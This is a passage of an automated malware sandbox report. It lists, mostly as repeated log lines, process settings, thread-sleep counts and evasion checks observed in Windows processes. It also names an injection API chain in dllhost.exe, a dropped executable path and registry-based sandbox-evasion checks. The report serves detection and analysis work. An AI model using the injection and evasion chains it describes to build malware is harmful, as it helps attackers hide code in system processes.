Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,14_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5850Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3878Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6827Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 648Jump to behavior
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1953Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 7917Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 418Jump to behavior
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 864Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 5377Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1478Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8786Jump to behavior
Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 389Jump to behavior
Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 1427Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1345Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1333Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1301Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1273Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1321Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1409Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1409Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1379Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1377Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5444Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4307Jump to behavior
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1349
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1343
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1341
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1332
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1355
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1347
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1347
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1345
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1313
Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 388
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1266
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1357
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1248
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\$nya-onimai2\IhrFKM.exeJump to dropped file
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_14-612
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_14-615
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-574
Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.7 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 2.9 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 5850 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 3878 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 7684Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7716Thread sleep count: 6827 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7716Thread sleep time: -6827000s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7720Thread sleep count: 648 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7720Thread sleep time: -64800s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7716Thread sleep count: 1953 > 30Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 7716Thread sleep time: -1953000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7728Thread sleep count: 7917 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7728Thread sleep time: -7917000s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7732Thread sleep count: 418 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7732Thread sleep time: -41800s >= -30000sJump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7728Thread sleep count: 864 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 7728Thread sleep time: -864000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7740Thread sleep count: 5377 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7740Thread sleep time: -5377000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7744Thread sleep count: 1478 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7744Thread sleep time: -147800s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 8072Thread sleep count: 8786 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 8072Thread sleep time: -8786000s >= -30000sJump to behavior
Source: C:\Windows\System32\dwm.exe TID: 8076Thread sleep count: 389 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 8076Thread sleep time: -38900s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exe TID: 4304Thread sleep time: -142700s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2872Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep count: 174 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2992Thread sleep time: -174000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2908Thread sleep count: 1333 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2908Thread sleep time: -133300s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8084Thread sleep count: 53 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8084Thread sleep time: -53000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8088Thread sleep count: 1301 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8088Thread sleep time: -130100s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8100Thread sleep count: 34 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8100Thread sleep time: -34000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep count: 1273 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep time: -127300s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8112Thread sleep count: 149 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8112Thread sleep time: -149000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8116Thread sleep count: 1321 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8116Thread sleep time: -132100s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8124Thread sleep count: 152 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8124Thread sleep time: -152000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8128Thread sleep count: 1409 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8128Thread sleep time: -140900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8136Thread sleep count: 161 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8136Thread sleep time: -161000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8140Thread sleep count: 1409 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8140Thread sleep time: -140900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8148Thread sleep count: 159 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8148Thread sleep time: -159000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8152Thread sleep count: 1379 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8152Thread sleep time: -137900s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep count: 164 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7364Thread sleep time: -164000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7308Thread sleep count: 1377 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7308Thread sleep time: -137700s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7324Thread sleep count: 175 > 30
